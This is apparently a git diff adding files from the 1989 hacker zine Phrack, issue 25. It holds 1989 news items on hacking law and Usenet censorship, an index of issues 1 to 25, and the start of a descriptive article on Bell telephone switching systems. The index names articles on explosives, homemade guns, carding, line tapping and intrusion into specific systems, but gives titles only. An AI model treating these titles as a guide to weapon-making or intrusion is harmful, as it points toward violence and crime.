+                                  Surveillance Systems>Pascal>Generic C>
+                                  Suggestions>Mac>BBS Numbers>Phrack>Cable>
+                                  .....and many other miscellaneous
+
+Requirements:  We don't have any requirements.  Anyone is welcome.  Access is
+               given immediately.  We also allow alias names if desired.  We
+               hope you will enjoy your stay.
+
+The Telecommunication [H.D.BBS] <-- Hackers Den
+
+[A 2600 Magazine Bulletin Board System]
+
+Data: (718)358/9209
+
+300/1200
+_______________________________________________________________________________
+
+Computer Users Worry That Stanford Set Precedent              February 20, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Tom Philp (San Jose Mercury News)
+
+ "Decision to block bulletin board impedes free access to public information."
+
+Computer scientists at Stanford fear the university has entered a never-ending
+role as a moral regulator of computer bulletin boards by recently blocking
+access to a list of jokes deemed to serve no "university educational purpose."
+
+Many computer users on campus consider bulletin boards to be the libraries of
+the future - and thus subject to the same free access as Stanford's library
+system.  Instead, Stanford apparently has become the nation's first university
+to block access to part of the international bulletin network called Usenet,
+which reaches 250,000 users of computers running the Unix operating system,
+according to a computer scientist who helped create the network.
+
+To some computer users, Stanford's precedent is troubling.  "We get into some
+very, very touchy issues when system administrators are given the authority to
+simply get rid of files that they deem inappropriate on publicly available
+systems," said Gary Chapman, executive director of Computer Professionals for
+Social Responsibility, a Palo Alto-based organization with 2,500 members.  "My
+personal view is that freedom of speech should apply to computer information."
+
+Ralph Gorin, director of Academic Information Resources at Stanford, disagrees.
+"I think that it's very clear that one should be either in favor of free speech
+and all of the ramifications of that or be willing to take the consequences of
+saying free speech sometimes, and then having to decide when," Gorin said.
+
+Since the jokes ban, more than 100 Stanford computer users, including a leading
+researcher in artificial intelligence, have signed a protest petition.  And
+there is some evidence to indicate Stanford officials are looking for a way out
+of the dilemma they have created.
+
+The joke bulletin board, called "rec.humor.funny," is one of several bulletin
+boards that discuss controversial topics.  Stanford, for example, continues to
+permit access to bulletin boards that allow students to discuss their use of
+illegal drugs, sexual techniques, and tips on nude beaches.  Gorin said he is
+unaware of those bulletin boards.
+
+The jokes bulletin board came to Stanford officials' attention in December,
+after a report about it in a Canadian newspaper.  The jokes hit a raw nerve
+with campus officials, who have been plagued by a variety of racist incidents
+on campus.  And so they decided on January 25, 1989 to block the jokes from
+passing through the university's main computer.  "At a time when the university
+is devoting considerable energy to suppress racism, bigotry and other forms of
+prejudice, why devote computer resources to let some outside person exploit
+these?"  Gorin explained.
+
+Stanford officials were troubled because the jokes bulletin board is
+"moderated," meaning that one person controls everything that it publishes.
+The jokes bulletin board "does not in itself provide for discussion of the
+issues that it raises," Gorin said.  The moderator, Brad Templeton of Waterloo,
+in the Canadian province of Ontario, publishes only jokes.  Comments he
+receives go on a separate bulletin board, called "rec.humor.d."  For Stanford,
+the existence of a comment bulletin board is not enough because people who call
+up the jokes will not necessarily see the comments.
+
+The problem with "unmoderated" bulletin boards is clutter, according to Eugene
+Spafford, a computer scientist at Purdue University who is one of the pioneers
+of Usenet.  The network accumulates the equivalent of 4,000 double-spaced,
+typewritten pages every day, far too many comments for any person to read.
+"People who use a network as an information resource like a more focused
+approach," Spafford said.  They is why another, unmoderated, bulletin board
+that has many comments and fewer - but equally offensive - jokes, is far less
+popular.  Stanford does not block transmission of that bulletin board.
+Templeton's bulletin board is the most popular of the 500 on Usenet.  An
+estimated 20,000 computer users pull up the jokes on their screens every day,
+Spafford said.
+
+Usenet has its own form of democracy, calling elections to determine whether a
+new bulletin board should be created, and who - if anyone - should moderate it.
+Templeton's jokes bulletin board was created by such a vote.  Stanford's
+decision to block access to it "strikes me as hypocritical," Spafford said.
+"At best, it's someone who doesn't understand the situation who is trying to do
+something politically correct."
+
+John McCarthy, a Stanford computer science professor and one of the founders of
+the field of artificial intelligence, has met with university President Donald
+Kennedy to discuss his opposition to blocking the jokes.  "No one of these
+(bulletin boards) is especially important," McCarthy said.  The point is that
+regulating access to them "is not a business that a university should go into."
+
+Since deciding to block access to the bulletin board, the administration has
+referred the issue to the steering committee of Stanford's Faculty Senate.  The
+future of the bulletin board may end up in the hands of the professors.  "I
+think that is an entirely appropriate internal process for reaching that
+decision," Gorin said.
+
+Added McCarthy:  "I should say that I am optimistic now that this ban will be
+corrected.  There are some people who think they made a mistake."
+_______________________________________________________________________________
+
+Outlaw Computer Hacking -- CBI                                    March 1, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Peter Large (Guardian Newspaper)
+
+ "Computer hacking should be made a criminal offense, the CBI said yesterday."
+
+The employer's organization said it was vital to secure a stable base for
+computer development, since computers played a major part in the nation's
+economic competitiveness and "social well-being."  Computer buffs were
+increasingly gaining unauthorized access to confidential information held by
+banks and other companies in computer databanks, it said.
+
+Much computer fraud is hidden by firms, but the conservative consensus estimate
+is that the cost to British business is at least 30 million a year.
+
+But computer disasters, caused by software failures, fire and power failures,
+are reckoned to be cost about ten times that.
+
+The CBI, in its response to the Law Commission's paper on computer misuse, made
+six proposals:
+
+     *  Hacking cases should be tried by jury;
+
+     *  The concept of "criminal damage" should cover computer programs and
+        data and attacks by computer viruses (rogue programs that can disrupt
+        or destroy data);
+
+     *  Laws should be harmonized internationally so that hackers cannot
+        operate across country boundaries;
+
+     *  The offense of obtaining unauthorized access should include
+        non-physical access, such as computer eavesdropping;
+
+     *  Even unsuccessful attempts to hack should be subject to criminal
+        sanctions;
+
+     *  The value of confidential commercial information should be protected by
+        civil remedies for loss or damage caused by hackers.
+
+The United States, Canada, Sweden, and France have outlawed hacking, but it is
+not an offense in Great Britain unless damage is done, such as fraud or theft.
+In February, the Jack Report on banking law proposed outlawing the hacker.  The
+Law Commission has produced a discussion document and is to make firm proposals
+later this year.
+_______________________________________________________________________________
+
+Highest German Court Strikes Down A Telecommunications Law       March 23, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The law in question reads:
+
+Paragraph 15, Section II of the law regulating telecommunication equipment:
+
+     "Any person who installs, changes, or uses modifiable
+     telecommunications equipment in violation of the lending conditions
+     will be punished with two years imprisonment or fines."
+
+The German Supreme Court has declared this law unconstitutional and
+null-and-void in a decision of June 22, 1988.  The consequence to this is that
+imported modems can no longer be confiscated (according to the guidelines of
+the Code of Criminal Procedures).
+
+The German legislature has been called upon to pass a new law.  However,
+because there exists such strong interest and influence of industry, users, and
+the European market-community against such a new prohibitive law, it is
+believed that there is reason for optimism and no such prohibitive law will be
+passed.
+_______________________________________________________________________________
+
+California PUC Pulls Plug On AOS                                 March 24, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+According to a story in the San Francisco Examiner, Business Section, the
+Public Utilities Commission directed TPC (Pacific Bell) to disconnect 54
+privately owned pay phones in its first enforcement action against "price
+gouging by some operator services".
+
+"Privately owned pay phones can charge no more than 10 cents above Pacific Bell
+and AT&T rates for local calls or calls in California".
+
+The 54 privately owned pay phones belonged to 12 owners, and their charges were
+found to be at least 90% higher than the authorized rates, and sometimes were
+up to three times as high.  All owners had been warned of the overcharging in
+November.  Under the PUC orders, Pacific Bell has sent letters to the owners
+notifying them that their plug will be pulled in seven days.
+
+The article also mentioned the FCC last month imposed some restrictions on five
+AOS firms accused of egregious gouging that require the companies "to identify
+themselves to each caller and disclose rates if computers asked."
+_______________________________________________________________________________
+
+PWN Quicknotes
+~~~~~~~~~~~~~~
+1.  The University of Delaware Library System electronic card catalog (DELCAT)
+    is now available for access to residents throughout Delaware.  In each
+    county within Delaware, there is now a local number which you can call to
+    link up.  Service is provided by the Bell Atlantic Public Data Network.
+
+    The numbers are:
+
+                       New Castle County (302) 366-0800
+                       Sussex County     (302) 856-7055
+                       Kent County       (302) 734-9465
+
+    Users wishing to call from out of state should call (302) 366-0800.  Normal
+    long distance charges apply for out of state callers.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+2.  Strange as it may sound, several bulletin board system operators
+    in the northeastern part of the country have received letters from the
+    Federal Bureau of Investigation (FBI) telling them to shut down their
+    systems or face unpleasant consequences.  Two of the bulletin board systems
+    in question are The Edge and Ridgewood.  Confirmation that these letters
+    were actually from the FBI has still not been achieved.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+3.  Mark Tabas is currently supposed to be working on a book.  He has requested
+    that anyone that has copies of any of his text files or news reports about
+    him should contact him.
+
+    Unfortunately, we are not at liberty to give out his mailing address in a
+    forum as public as Phrack World News.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+4.  CompuServe (CIS) just announced that they will begin charging a $1.50 per
+    month user fee over and above whatever usage is charged.  The fee will be
+    waived during the first three months of a new account.  They will, however,
+    make some services free -- like looking up your charges.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+5.  Unconfirmed rumors from the security side of the hacking community state
+    that GTE Telenet has acquired new assistance in the fight against Telenet
+    abusers and new security measures are already in the process of
+    implementation.
+
+    The alledged new assistance was in the form of personnel:  People who are
+    regarded as "experts" not only on Telenet, but the hacking community as
+    well.
+______________________________________________________________________________
+
diff --git a/phrack25/2.txt b/phrack25/2.txt
new file mode 100644
index 0000000..37bc38e
--- /dev/null
+++ b/phrack25/2.txt
@@ -0,0 +1,381 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 2 of 11
+
+                            Phrack Inc. Newsletter
+                         25th Issue Anniversary Index
+
+                   From November 17, 1985 to March 29, 1989
+
+                      By Knight Lightning and Taran King
+
+                               Special Thanks To
+
+                  Hatchet Molly / Prime Suspect / Red Knight
+
+
+Phrack 1 (November 17, 1985)
+
+1.  Introduction to Phrack Inc. Issue 1 by Taran King
+2.  SAM Security Article by Spitfire Hacker
+3.  Boot Tracing on Apple by Cheap Shades
+4.  The Fone Phreak's Revenge by Iron Soldier
+5.  MCI International Cards by Knight Lightning
+6.  How to Pick Master Locks by Gin Fizz and Ninja NYC
+7.  How to Make an Acetylene Balloon Bomb by The Clashmaster
+8.  School/College Computer Dial-Ups by Phantom Phreaker
+
+
+Phrack 2 (January 5, 1986)
+
+1.  Phrack Inc. Issue 2 Index by Taran King
+2.  Prevention of the Billing Office Blues by Forest Ranger
+3.  Homemade Guns by Man-Tooth
+4.  Blowguns by The Pyro
+5.  TAC Dialups by Phantom Phreaker
+6.  Universal Information Services via ISDN by Taran King
+7.  MCI Overview by Knight Lightning
+8.  Hacking RSTS by Data Line
+9.  Phreak World News by Knight Lightning
+
+
+Phrack 3
+
+1.  Phrack Inc. Issue 3 Index by Cheap Shades
+2.  Rolm Systems written by Monty Python
+3.  Making Shell Bombs by Man-Tooth
+4.  Signalling Systems Around the World by Data Line
+5.  Private Audience by Overlord
+6.  4-Tel Systems by Phantom Phreaker
+7.  Eavesdropping by Circle Lord
+8.  Building a Shock Box by Circle Lord
+9.  Introduction to PBX's by Knight Lightning
+10. Phreak World News II by Knight Lightning
+
+
+Phrack 4
+
+1.  Pro-Phile I on Crimson Death by Taran King
+2.  Ringback Codes for the 314 NPA (Incomplete) by Data Line
+3.  False Identification by Forest Ranger
+4.  Profile on MAX Long Distance Service by Phantom Phreaker
+5.  Breaching and Clearing Obstacles by Taran King
+6.  Crashing DEC-10's by The Mentor
+7.  Centrex Renaissance by Jester Sluggo
+8.  The Tried and True Home Production Method for Speed by The Leftist
+9.  Phrack World News Issue 3 Part 1 by Knight Lightning
+10. Phrack World News Issue 3 Part 2 by Knight Lightning
+11. Phrack World News Issue 3 Part 3 by Knight Lightning
+
+
+Phrack 5
+
+1.  Phrack V Intro by Taran King
+2.  Phrack Pro-Phile of Broadway Hacker by Taran King
+3.  Hacking DEC's by Carrier Culprit
+4.  Hand to Hand Combat by Bad Boy in Black
+5.  DMS-100 by Knight Lightning
+6.  Bolt Bombs by The Leftist
+7.  Wide Area Networks Part 1 by Jester Sluggo
+8.  Radio Hacking by The Seker
+9.  Mobile Telephone Communications by Phantom Phreaker
+10. Phrack World News IV Part 1 by Knight Lightning
+11. Phrack World News IV Part 2 by Knight Lightning
+12. Phrack World News IV Part 3 by Knight Lightning
+
+
+Phrack 6
+
+1.  Index by Taran King
+2.  Pro-Phile on Groups by Knight Lightning
+3.  The Technical Revolution by Dr. Crash
+4.  Fun with Lighters by The Leftist
+5.  Nasty Unix Tricks by Shooting Shark
+6.  Smoke Bombs by Alpine Kracker
+7.  Cellular Telephones by High Evolutionary
+8.  Wide Area Networks Part 2 by Jester Sluggo
+9.  Phrack World News Part 1 by Knight Lightning
+10. Phrack World News Part 2 by Knight Lightning
+11. Phrack World News Part 3 by Knight Lightning
+12. Phrack World News Part 4 by Knight Lightning
+13. Phrack World News Part 5 by Knight Lightning
+
+
+Phrack 7
+
+1.  Intro/Index by Taran King
+2.  Phrack Pro-Phile of Scan Man by Taran King
+3.  Hacker's Manifesto by The Mentor
+4.  Hacking Chilton's Credimatic by Ryche
+5.  Hacking RSTS Part 1 by The Seker
+6.  How to Make TNT by The Radical Rocker
+7.  Trojan Horses in Unix by Shooting Shark
+8.  Phrack World News VI Part 1 by Knight Lightning
+9.  Phrack World News VI Part 2 by Knight Lightning
+10. Phrack World News VI Part 3 by Knight Lightning
+
+
+Phrack 8
+
+1.  Phrack Inc. Index by Taran King
+2.  Phrack Pro-Phile V on Tuc by Taran King
+3.  City-Wide Centrex by The Executioner
+4.  The Integrated Services Digital Network by Dr. Doom
+5.  The Art of Junction Box Modeming by Mad Hacker 616
+6.  Compuserve Info by Morgoth and Lotus
+7.  Fun with Automatic Tellers by The Mentor
+8.  Phrack World News VII Part 1 by Knight Lightning
+9.  Phrack World News VII Part 2 by Knight Lightning
+
+
+Phrack 9
+
+1.  Introduction to Phrack Inc. Issue Nine by Taran King
+2.  Phrack Pro-Phile on The Nightstalker by Taran King
+3.  Fun With the Centagram VMS Network by Oryan Quest
+4.  Programming RSTS/E File2:  Editors by Solid State
+5.  Inside Dialog by Ctrl C
+6.  Plant Measurement by The Executioner
+7.  Multi-User Chat Program for DEC-10's by TTY-Man and The Mentor
+8.  Introduction to Videoconferencing by Knight Lightning
+9.  Loop Maintenance Operations System by Phantom Phreaker and Doom Prophet
+10. Phrack World News VIII by Knight Lightning
+
+
+Phrack 10
+
+1.  Introduction to Phrack 10 by Taran King
+2.  Pro-Phile on Dave Starr by Taran King
+3.  The TMC Primer by Cap'n Crax
+4.  A Beginner's Guide to the IBM VM/370 by Elric of Imrryr
+5.  Circuit Switched Digital Capability by The Executioner
+6.  Hacking Primos Part I by Evil Jay
+7.  Automatic Number Identification by Phantom Phreaker and Doom Prophet
+8.  Phrack World News IX Part 1 by Knight Lightning
+9.  Phrack World News IX Part 2 by Knight Lightning
+
+
+Phrack 11
+
+1.  Index to Phrack 11 by Taran King
+2.  Phrack Pro-Phile VIII on Wizard of Arpanet by Taran King
+3.  PACT:  Prefix Access Code Translator by The Executioner
+4.  Hacking Voice Mail Systems by Black Knight from 713
+5.  Simple Data Encryption or Digital Electronics 101 by The Leftist
+6.  AIS - Automatic Intercept System by Taran King
+7.  Hacking Primos I, I, III by Evil Jay
+8.  Telephone Signalling Methods by Doom Prophet
+9.  Cellular Spoofing By Electronic Serial Numbers donated by Amadeus
+10. Busy Line Verification by Phantom Phreaker
+11. Phrack World News X by Knight Lightning
+12. Phrack World News XI by Knight Lightning
+
+
+Phrack 12
+
+1.  Index of Phrack 12 by Taran King
+2.  Pro-Phile IX on Agrajag The Prolonged by Taran King
+3.  Preview to Phrack 13-The Life & Times of The Executioner
+4.  Understanding the Digital Multiplexing System (DMS) by Control C
+5.  The Total Network Data System by Doom Prophet
+6.  CSDC II - Hardware Requirements by The Executioner
+7.  Hacking:  OSL Systems by Evil Jay
+8.  Busy Line Verification Part II by Phantom Phreaker
+9.  Scan Man's Rebuttal to Phrack World News
+10. Phrack World News XII Part 1 by Knight Lightning
+11. Phrack World News XII Part 2 by Knight Lightning
+
+
+Phrack 13 (April 1, 1987)
+
+1.  Phrack 13 Index by Taran King
+2.  Real Phreaker's Guide Vol. 2 by Taran King and Knight Lightning
+3.  How to Fuck Up the World - A Parody by Thomas Covenant
+4.  How to Build a Paisley Box by Thomas Covenant and Double Helix
+5.  Phreaks In Verse by Sir Francis Drake
+6.  R.A.G. - Rodents Are Gay by Evil Jay
+7.  Are You A Phone Geek?  by Doom Prophet
+8.  Computerists Underground News Tabloid - CUNT by Crimson Death
+9.  RAGS - The Best of Sexy Exy
+10. Phrack World News XIII by Knight Lightning
+
+
+
+Phrack 14
+
+1.  Phrack 14 Index by Knight Lightning
+2.  Phrack Pro-Phile X on Terminus by Taran King
+3.  The Conscience of a Hacker (Reprint) by The Mentor
+4.  REMOBS:  The Reality of The Myth by Taran King
+5.  Understanding DMS Part II by Control C
+6.  TRW Business Terminology by Control C
+7.  Phrack World News Special Edition 1 by Knight Lightning
+8.  Phrack World News Issue XIV Part 1 by Knight Lightning
+9.  Phrack World News Issue XIV Part 2 by Knight Lightning
+
+
+Phrack 15
+
+1.  Phrack XV Intro by Shooting Shark
+2.  More Stupid Unix Tricks by Shooting Shark
+3.  Making Free Local Payfone Calls by Killer Smurf
+4.  Advanced Carding XIV by The Disk Jockey
+5.  Gelled Flame Fuels by Elric of Imrryr
+6.  Phrack World News XV/Part 1 by Knight Lightning
+7.  Phrack World News XV/Part 2 by Knight Lightning
+8.  Phrack World News XV/Part 3 by Sir Francis Drake
+
+
+Phrack 16
+
+1.  Phrack 16 Intro by Elric of Imrryr
+2.  BELLCORE Information by The Mad Phone-Man
+3.  A Hacker's Guide to Primos:  Part 1 by Cosmos Kid
+4.  Hacking GTN by The Kurgan
+5.  Credit Card Laws Laws by Tom Brokow
+6.  Tapping Telephone Lines by Agent Steal
+7.  Reading Trans-Union Credit Reports by The Disk Jockey
+8.  Phrack World News XXVI/Part 1 by Shooting Shark
+9.  Phrack World News XXVI/Part 2 by The Mad Phone-Man
+10. Phrack World News XXVI/Part 3 by The Mad Phone-Man
+11. Phrack World News XXVI/Part 4 by Shooting Shark
+12. Phrack World News XXVI/Part 5 by The $muggler
+
+
+Phrack 17 (April 7, 1988)
+
+1.  Phrack XVII Introduction by Shooting Shark
+2.  Dun & Bradstreet Report on AT&T by Elric of Imrryr
+3.  Dun & Bradstreet Report on Pacific Telesis by Elric of Imrryr
+4.  Nitrogen-Trioxide Explosive by Signal Substain
+5.  How to Hack Cyber Systems by Grey Sorcerer
+6.  How to Hack HP2000's by Grey Sorcerer
+7.  Accessing Government Computers by The Sorceress
+8.  Dial-Back Modem Security by Elric of Imrryr
+9.  Data Tapping Made Easy by Elric of Imrryr
+10. Phrack World News XVII/Part 1 by Sir Francis Drake
+11. Phrack World News XVII/Part 2 by The $muggler
+12. Phrack World News XVII/Part 3 by The Sorceress
+
+
+Phrack 18 (June 7, 1988)
+
+1.  Index of Phrack 18 by Crinsom Death
+2.  Pro-Phile XI on Ax Murderer by Crimson Death
+3.  An Introduction to Packet Switched Netwoks by Epsilon
+4.  Primos: Primenet, RJE, DPTX by Magic Hasan
+5.  Hacking CDC's Cyber by Phrozen Ghost
+6.  Unix for the Moderate by URvile
+7.  Unix System Security Issues by Jester Sluggo
+8.  Loop Maintenance Operating System by Control C
+9.  A Few Thinigs About Networks by Prime Suspect
+10. Phrack World News XVIII Part I by Epsilon
+11. Phrack World News XVIII Part II by Epsilon
+
+
+Phrack 19
+
+1.  Phrack Inc. Index by Crimson Death
+2.  DCL Utilities for VMS Hackers by The Mentor
+3.  Digital Multiplexing Systems (Part 2) by Control C
+4.  Social Security Number Formatting by Shooting Shark
+5.  Facility Assignment & Control Systems by Phantom Phreaker
+6.  Phrack Editorial on Microbashing by The Nightstalker
+7.  Phrack World News XVIV/Part 1 by Knight Lightning
+8.  Phrack World News XVIV/Part 2 by Epsilon
+
+
+Phrack 20 (October 12, 1988)
+
+1.  Phrack XX Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile on Taran King
+3.  Timeline Featuring Taran King, Knight Lightning, and Cheap Shades
+4.  Welcome To Metal Shop Private by TK, KL, and CS
+5.  Metal/General Discussion
+6.  Phrack Inc./Gossip
+7.  Phreak/Hack Sub
+8.  Social Engineering
+9.  New Users
+10. The Royal Court
+11. Acronyms
+12. Phrack World News XX Featuring SummerCon '88 by Knight Lightning
+
+
+Phrack 21 (November 4, 1988)
+
+1.  Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile on Modem Master by Taran King
+3.  Shadows Of A Future Past (Part 1 of the Vicious Circle Trilogy) by KL
+4.  The Tele-Pages by Jester Sluggo
+5.  Satellite Communications by Scott Holiday
+6.  Network Management Center by Knight Lightning and Taran King
+7.  Non-Published Numbers by Patrick Townsend
+8.  Blocking Of Long Distance Calls by Jim Schmickley
+9.  Phrack World News Special Edition II by Hatchet Molly and Knight Lightning
+10. Phrack World News Issue XXI Part 1 by Knight Lightning and Epsilon
+11. Phrack World News Issue XXI Part 2 by Knight Lightning and Epsilon
+
+
+Phrack 22 (December 23, 1988)
+
+1.  Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile on Karl Marx by Taran King & Knight Lightning
+3.  The Judas Contract (Part 2 of the Vicious Circle Trilogy) by KL
+4.  A Novice's Guide To Hacking (1989 Edition) by The Mentor
+5.  An Indepth Guide In Hacking Unix by Red Knight
+6.  Yet Another File On Hacking Unix by >Unknown User<
+7.  Computer Hackers Follow A Guttman-Like Progression by Richard C. Hollinger
+8.  A Report On The InterNet Worm by Bob Page
+9.  Phrack World News Issue XXII/Part 1 by Knight Lightning and Taran King
+10. Phrack World News Issue XXII/Part 2 by Knight Lightning and Taran King
+11. Phrack World News Issue XXII/Part 3 by Knight Lightning and Taran King
+12. Phrack World News Issue XXII/Part 4 by Knight Lightning and Taran King
+
+
+Phrack 23 (January 28, 1989)
+
+1.  Phrack Inc. XXIII Index by Knight Lightning & Taran King
+2.  Phrack Prophile XXIII Featuring The Mentor by Taran King
+3.  Subdivisions (Part 3 of The Vicious Circle Trilogy) by Knight Lightning
+4.  Utopia; Chapter One of FTSaga by Knight Lightning
+5.  Foundations On The Horizon; Chapter Two of FTSaga by Knight Lightning
+6.  Future Transcendent Saga Index A from the Bitnet Services Library
+7.  Future Transcendent Saga Index B from the Bitnet Services Library
+8.  Getting Serious About VMS Hacking by VAXBusters International
+9.  Can You Find Out If Your Telephone Is Tapped? by Fred P. Graham (& VaxCat)
+10. Big Brother Online by Thumpr (Special Thanks to Hatchet Molly)
+11. Phrack World News XXIII/Part 1 By Knight Lightning
+12. Phrack World News XXIII/Part 2 by Knight Lightning
+
+
+Phrack 24 (February 25, 1989)
+
+1.  Phrack Inc. XXIV Index by Taran King and Knight Lightning
+2.  Phrack Prophile XXIV Featuring Chanda Leir by Taran King
+3.  Limbo To Infinty; Chapter Three of FTSaga by Knight Lightning
+4.  Frontiers; Chapter Four of FTSaga by Knight Lightning
+5.  Control Office Administration Of Enhanced 911 Service by The Eavesdropper
+6.  Glossary Terminology For Enhanced 911 Service by The Eavesdropper
+7.  Advanced Bitnet Procedures by VAXBusters International
+8.  Special Area Codes by >Unknown User<
+9.  Lifting Ma Bell's Cloak Of Secrecy by VaxCat
+10. Network Progression by Dedicated Link
+11. Phrack World News XXIV/Part 1 by Knight Lightning
+12. Phrack World News XXIV/Part 2 by Knight Lightning
+13. Phrack World News XXIV/Part 3 by Knight Lightning
+
+
+Phrack 25 (March 29, 1989)
+
+1.  Phrack Inc. XXV Index by Taran King and Knight Lightning
+2.  25th Anniversary Index by Knight Lightning, Taran King, and other friends
+3.  Bell Network Switching Systems by Taran King
+4.  SPAN:  Space Physics Analysis Network by Knight Lightning
+5.  Unix Cracking Tips by Dark OverLord
+6.  Hiding Out Under Unix by Black Tie Affair
+7.  The Blue Box And Ma Bell by The Noid
+8.  Hacking:  What's Legal And What's Not by Hatchet Molly
+9.  Phrack World News XXV/Part 1 by Knight Lightning
+10. Phrack World News XXV/Part 2 by Knight Lightning
+11. Phrack World News XXV/Part 3 by Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack25/3.txt b/phrack25/3.txt
new file mode 100644
index 0000000..0b4aa67
--- /dev/null
+++ b/phrack25/3.txt
@@ -0,0 +1,260 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 3 of 11
+
+                        Bell Network Switching Systems
+
+                       An Informational Definitive File
+
+                                 By Taran King
+
+                                March 14, 1989
+
+
+         Throughout my many conversations with what many consider the "elite"
+of the community, I have come to realize that even the highest up on the
+hierarchical map do not know all of the little differences and specificities of
+the switching systems that the BOCs use throughout the nation.  This file was
+written so that people could understand the differences between their switch
+and those switches in areas where they have friends or that they pass through.
+
+         There are two broad categories that switches can be separated into:
+local and tandem.  Local offices connect customer lines to each other for
+local calls and connect lines to trunks for interoffice calls.  Tandem
+switching is subdivided into two categories:  local tandem offices and toll
+offices.  Local toll offices connect trunks to trunks within a metropolitan
+area whereas toll offices connect trunks to trunks from the toll network
+portion (class 1 to 4) of the hierarchical Public Switched Telephone Network
+(PSTN).
+
+         Because of the convenience of having direct interface with customer
+lines, local switching has built in functions needed to provide exchange
+services such as local calling, custom calling features, Touch-Tone service,
+E911 service, and exchange business services (like Centrex, ESSX-1, and
+ESS-ACD.  Centrex is a service for customers with many stations that is
+provided out of the Central Office.  ESSX-1 service limits the number of
+simultaneous incoming and outgoing calls and the number of simultaneous
+intragroup calls to software sizes specified by the customer.  ESS-ACD is the
+exchange service equivalent to Automatic Call Distribution except the call
+distribution takes place in a Centrex-functioning portion of the electronic
+switch.)
+
+         Geographic centralization of the tandem office allows efficiency in
+providing centralized billing and network services.
+
+         Automatic switching was formally installed by the Bell System in 1919
+and although there are many replacements that update old and less preferable
+services, many older offices still exist in various parts of the country.
+
+
+ELECTROMECHANICAL SWITCHING SYSTEMS
+
+         The Step By Step (SXS) switching system, also known as the Strowger
+system, was the earliest switching system.  Invented by A. B. Strowger in
+1889, it is currently used in rural and suburban areas around the country as
+well as some metropolitan areas which were small when the switch was
+installed.  The term "Step By Step" describes both the manner in which the
+switching network path is established and the way in which each of the
+switches in the path operates.  They combine vertical stepping and a
+horizontal rotary stepping motion to find the number dialed through pulse.
+The drawbacks of the SXS system include not being able to have Touch Tone
+calling or alternative routing without adding expensive equipment to the
+office and also that the customer's telephone number is determined by the
+physical termination/location of the line or connector on the system.  The
+line cannot be moved without changing the telephone number.  The other
+drawback is the high maintenance cost.  These reasons, among others, have led
+to a drop in the amount of SXS systems seen around the country.
+
+         The No. 1 Crossbar (XBAR) was developed for use in metropolitan
+areas.  The XBAR system uses horizontal and vertical bars to select the
+contacts.  There are five selecting bars mounted horizontally across the front
+of each XBAR switch.  Each selecting bar can choose either of two horizontal
+rows of contacts.  The five horizontal selecting bars can therefore select ten
+horizontal rows of contacts.  There are ten or twenty vertical units mounted
+on the switch and each vertical unit forms one vertical path.  Each switch has
+either 100 or 200 sets of crosspoints/contacts depending on the number of
+vertical units.
+
+         The No. 5 Crossbar was developed to fill the need for a switching
+system that would be more productive in suburban residential areas or smaller
+cities.  The No. 5 XBAR also included automatic recording of call details for
+billing purposes to allow for DDD (Direct Distance Dialing).  The No. 5 XBAR
+is separated into 2 parts:  the switching network where all the talking paths
+are established and the common-control equipment which sets up the talking
+paths.  Various improvements have been made on the No. 5 XBAR over the years
+such as centralized automatic message accounting, line link pulsing to
+facilitate DID (Direct Inward Dialing) to stations served by a dial PBX
+(Private Branch Exchange), international DDD, Centrex service, and ACD
+capability.  The No. 5 Electronic Translator System (ETS) was also a
+development which used software instead of wire cross-connections to provide
+line, trunk, and routing translations as well as storing billing information
+for transmissions via data link to a centralized billing collection system.
+
+         The No. 4 Crossbar is a common-control system designed for toll
+service with crossbar switches making up its switching network.  The No. 4A
+XBAR system was designed for metropolitan areas and added the ability to have
+CAMA (Centralized Automatic Message Accounting) as well as foreign-area
+translation, automatic alternate routing, and address digit manipulation
+capabilities (which is converting the incoming address to a different address
+for route control in subsequent offices, deleting digits, and prefixing new
+digits if needed).  The No. 4A ETS replaced the card translator (which was
+used for translation via phototransistors) and allowed billing and route
+translation functions to be changed by teletypewriter input as it was a
+stored-program control processor.  CCIS (Common Channel Interoffice
+Signaling) was added to the No. 4A XBAR in 1976 for more efficient signaling
+between toll offices among other things.
+
+
+ELECTRONIC SWITCHING SYSTEMS
+
+         The Electronic Switching Systems were made possible by the invention
+of the transistor.  They apply the basic concepts of an electronic data
+processor, operating under the direction of a stored-program control, and
+high-speed switching networks.  The stored-program control allows system
+designs the necessary flexibility to design new features and install them
+easily.  The SPC controls the sequencing of operations required to establish a
+call.  It can control a line or trunk circuit according to its application.
+
+         The first electronic switching trial took place in Morris, IL in
+1960.  The first application of electronic local switching in the Bell System
+took place in May of 1965 with the cutover of the first 1ESS switch in
+Succasunna, NJ.
+
+         The 1ESS switching system was designed for areas where large numbers
+of lines and lines with heavy traffic are served.  It generally serves between
+10,000 and 65,000 lines.  The memory of the 1ESS is generally read only memory
+(ROM) so that neither software or hardware malfunctions can alter the
+information content.
+
+         The 1A Processor was introduced in 1976 in the first 1AESS switch.
+It was designed for local switching applications to be implemented into a
+working 1ESS switch.  It allowed the switching capacity to be doubled from
+the old 1ESS switches also.  The 1A Processor uses both ROM and RAM (Random
+Access Memory).  Magnetic tape units in the 1A Processor allow for system
+reinitialization as well as detailed call billing functions.
+
+         Both the 1ESS and the 1AESS switches use the same peripheral
+equipment which allows for easy transition.  Programs in both switches control
+routine tests, diagnose troubles, detect and report faults and troubles, and
+control emergency actions to ensure satisfactory operation.  Both switches
+offer the standard custom calling features as well as business features like
+Centrex, ESS-ACD, Enhanced Private Switched Communications Service or ETS
+(Electronic Tandem Switching).
+
+         The 2ESS was designed to extend electronic switching into suburban
